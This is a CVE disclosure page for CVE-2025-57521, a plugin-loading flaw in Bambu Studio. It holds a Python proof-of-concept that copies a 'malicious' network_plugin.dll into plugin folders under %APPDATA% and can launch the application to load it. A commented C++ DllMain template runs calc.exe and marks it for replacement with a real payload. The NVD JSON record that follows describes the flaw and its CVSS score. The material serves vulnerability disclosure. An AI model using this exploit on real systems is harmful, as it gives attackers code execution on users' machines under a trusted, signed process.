CVE-2025-57521

# CVE-2025-57521 PoC - Bambu Studio Malicious Network Plugin DLL # This PoC demonstrates the concept of placing a malicious DLL # in the expected plugin location to achieve code execution import os import shutil import subprocess # Target plugin directory controlled by the attacker (under %APPDATA%) APPDATA_PATH = os.environ.get('APPDATA', '') PLUGIN_DIRS = [ os.path.join(APPDATA_PATH, 'BambuStudio', 'plugins'), os.path.join(APPDATA_PATH, 'BambuStudio', 'network'), os.path.join(APPDATA_PATH, 'Bambu Lab', 'BambuStudio', 'plugins'), ] # Expected plugin name that Bambu Studio loads at startup TARGET_PLUGIN = "network_plugin.dll" MALICIOUS_PAYLOAD = "malicious_network.dll" def check_target_installed(): """Check if vulnerable Bambu Studio is installed""" common_paths = [ r"C:\Program Files\Bambu Studio\bambu-studio.exe", r"C:\Program Files (x86)\Bambu Studio\bambu-studio.exe", os.path.join(APPDATA_PATH, '..', 'Local', 'Programs', 'bambu-studio', 'bambu-studio.exe'), ] for path in common_paths: if os.path.exists(path): print(f"[+] Found Bambu Studio at: {path}") return True print("[-] Bambu Studio not found in common locations") return False def deploy_malicious_plugin(): """Deploy malicious DLL to the expected plugin location""" for plugin_dir in PLUGIN_DIRS: if not os.path.exists(plugin_dir): try: os.makedirs(plugin_dir, exist_ok=True) print(f"[+] Created plugin directory: {plugin_dir}") except PermissionError: continue target_path = os.path.join(plugin_dir, TARGET_PLUGIN) try: # Copy the malicious DLL to the expected location if os.path.exists(MALICIOUS_PAYLOAD): shutil.copy2(MALICIOUS_PAYLOAD, target_path) print(f"[+] Malicious plugin deployed to: {target_path}") return True else: print(f"[!] Payload {MALICIOUS_PAYLOAD} not found, creating stub") with open(target_path, 'wb') as f: f.write(b'MZ\x90\x00') # PE header stub return True except PermissionError: print(f"[-] Permission denied: {target_path}") return False def trigger_execution(): """Trigger Bambu Studio startup to load the malicious plugin""" bambu_path = r"C:\Program Files\Bambu Studio\bambu-studio.exe" if os.path.exists(bambu_path): print(f"[*] Launching Bambu Studio to trigger DLL loading...") subprocess.Popen([bambu_path]) print("[+] Bambu Studio launched, malicious plugin should execute") else: print("[-] Bambu Studio executable not found") if __name__ == "__main__": print("=" * 60) print("CVE-2025-57521 - Bambu Studio Plugin Hijacking PoC") print("=" * 60) if check_target_installed(): if deploy_malicious_plugin(): print("\n[*] Malicious plugin is in place.") print("[*] Waiting for user to launch Bambu Studio...") # Uncomment to auto-trigger: # trigger_execution() else: print("[-] Target application not found. Exiting.") // --- Malicious DLL (C++) that gets executed when loaded --- /* #include <windows.h> #include <stdlib.h> BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID lpReserved) { switch (reason) { case DLL_PROCESS_ATTACH: // Disable file system redirection for WOW64 PVOID oldValue; Wow64DisableWow64FsRedirection(&oldValue); // Execute malicious payload in context of Bambu Studio system("calc.exe"); // Replace with actual payload Wow64RevertWow64FsRedirection(oldValue); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } */

{"cve": {"id": "CVE-2025-57521", "sourceIdentifier": "[email protected]", "published": "2025-10-21T15:15:38.960", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bambu Studio 2.1.1.52 and earlier is affected by a vulnerability that allows arbitrary code execution during application startup. The application loads a network plugin without validating its digital signature or verifying its authenticity. A local attacker can exploit this behavior by placing a malicious component in the expected location, which is controllable by the attacker (e.g., under %APPDATA%), resulting in code execution within the context of the user. The main application is digitally signed, which may allow a malicious component to inherit trust and evade detection by security solutions that rely on signed parent processes."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://github.com/bambulab/BambuStudio/issues/7405", "source": "[email protected]"}, {"url": "https://github.com/piuppi/Proof-of-Concepts/blob/main/Bambu%20Lab/Bambu%20Studio/README.md", "source": "[email protected]"}, {"url": "https://wiki.bambulab.com/en/software/bambu-studio/release/release-note-2-3-0", "source": "[email protected]"}]}}